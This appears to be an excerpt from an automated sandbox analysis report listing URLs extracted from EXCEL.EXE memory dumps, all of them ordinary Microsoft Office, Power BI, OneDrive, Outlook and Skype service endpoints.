      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.cortana.ai
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.office.net
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net4
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net:
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netF
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netp~
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.onedrive.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comcel0
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/beta/myorg/importsGP
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets1SU
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups:P
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/ne
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://augloop.office.com
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2E5
      Source: EXCEL.EXE, 00000000.00000003.388601099.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300819273.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.389997345.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302225669.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.502179762.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.307988337.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303172575.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296664034.0000000012F37000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453179953.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422439258.0000000012F2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585171728.0000000012F2E000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: EXCEL.EXE, 00000000.00000003.502288674.000000000DEC5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.583692161.000000000DEC6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501376996.000000000DEC4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.308636150.000000000DEC7000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://cdn.entity.
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosP
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/x
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOR
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
